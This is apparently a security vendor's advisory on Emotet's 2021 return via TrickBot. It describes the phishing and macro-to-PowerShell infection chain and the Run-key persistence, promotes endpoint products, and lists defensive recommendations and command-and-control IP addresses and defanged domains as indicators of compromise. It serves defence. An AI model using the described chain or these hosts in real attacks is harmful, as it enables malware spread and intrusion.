Overview of emotet

Last seen in January 2021, after law enforcement took them down, Emotet is back and is using TrickBot to install Emotet malware on infected Windows systems. TrickBot is a malware botnet that is often used by cyber criminals to load secondary malware payloads and commonly seen in ransomware incidents .  

After 10 months of darkness, Emotet was recently seen by cyber security researcher, Brad Duncan, spamming multiple email campaigns to infect devices with the malware. The campaigns use reply-chain emails to persuade victims into opening malicious attachments disguised as Word/Excel documents or password-protected ZIP files. Reply-chain email attacks are another form of social engineering where the attacker sends a malicious email from a genuine, but stolen email account. Some of the reply-chain emails Duncan discovered included a missing wallet, a canceled meeting, and even political donations.  

Currently, there are two malicious documents being distributed. The first document is an Excel attachment asking the victim to click on “Enable Content” to view the contents. The other is a Word attachment that says the document is in “Protected” mode and users must enable content and editing to view it. However, after the victim opens the attachments and click, they enable malicious macros that launch a PowerShell command that then downloads the Emotet loader DLL from a compromised WordPress site.  

After being downloaded, Emotet configures a startup value under the following:  

HKCU\Software\Microsoft\Windows\CurrentVersion\Run  

This is done so the malware can launch when Windows starts. Emotet will then run silently in the background, waiting for commands to execute to from its C2. The commands could be used steal email account information, spread the malware to other computers, or to install additional payloads like TrickBot. Emotet was once considered the largest botnet cyber security had ever seen, let’s not give it a reason to regain its title. Keep your organization from becoming another victim by staying educated on cyber security best practices.  

 

How Avertium is Protecting Our Clients

  • Increasing visibility within your environment is crucial when trying to prevent or mitigate a potential attack from botnets like Emotet. Avertium offers EDR protection through SentinelOneSophos, and Microsoft Defender. 
    • SentinelOne prevents threats and extends protection from the endpoint to beyond. Find threats and eliminate blind spots with autonomous, real time, index-free threat ingestion and analysis that supports structured, unstructured, and semi-structured data.
    • Our Partners, Microsoft and Sophos, also offer endpoint protection. Sophos can help secure your environment by protecting and prioritizing potential threats. Microsoft Defender provides real-time threat detection, as well as firewall and network protection. The program comes standard with Windows. 
  • Avertium also offers user awareness training and phishing simulation campaigns using KnowBe4.. 

 

Avertium's recommendations

  • Block communication to C2s to prevent Emotet from dropping payloads on compromised devices.
  • Abuse.ch, a malware monitoring organization, has a list of 245 IP addresses to block. Please look at this list and use them accordingly.  
  • Apply security patches to your devices when they are released.  
  • Provide awareness training for employees regarding the dangers of phishing emails. 

indicators of compromise (iocs):

  • 181.167.35.84
  • 47.146.32.175
  • 45.173.88.33
  • 125.63.106.22
  • 103.8.26.102 
  • 94.177.248.64 
  • 66.42.55.5 
  • 103.8.26.103 
  • 81.0.236.93 
  • 188.93.125.116 
  • 45.76.176.10 
  • 168.197.250.14 
  • 51.178.61.60 
  • 185.148.169.10 
  • 51.210.242.234 
  • 196.44.98.190 
  • 177.72.80.14 
  • 210.57.217.132 
  • 51.68.175.8 
  • 45.79.33.48 
  • 103.161.172.108 
  • 163.172.50.82 
  • 93.188.167.97 
  • 185.184.25.237 
  • 202.29.239.161 
  • 191.252.196.221 
  • 91.200.186.228 
  • 31.220.49.39 
  • 122.129.203.163 
  • Ranvipclub[.net] 
  • visteme[.mx] 
  • newsmag.danielolayinkas[.com] 
  • 58.227.42.236 
  • 103.75.201.2 
  • 103.8.26.102 
  • 103.8.26.103 
  • 104.251.214.46 
  • 138.185.72.26 
  • 178.79.147.66 
  • 185.184.25.237 
  • 188.93.125.116 
  • 195.154.133.20 
  • 207.38.84.195 
  • 210.57.217.132 
  • 212.237.5.209 
  • 45.118.135.203 
  • 45.142.114.231 
  • 45.76.176.10 
  • 51.68.175.8 
  • 66.42.55.5 
  • 81.0.236.93 
  • 94.177.248.64 
  • av-quiz[.tk] 

 

References

Emotet, once the world's most dangerous malware, is back | ZDNet 

Here are the new Emotet spam campaigns hitting mailboxes worldwide (bleepingcomputer.com) 

Emotet botnet disrupted after global takedown operation (bleepingcomputer.com)  

Emotet Command and Control Servers - AlienVault - Open Threat Exchange 

TrickBot helps Emotet come back from the dead | Malwarebytes Labs - AlienVault - Open Threat Exchange 

 

catch up on our latest flash notice on the botenago botnet

Chat With One of Our Experts




Malware Emotet Botnet TrickBot Flash Notice Blog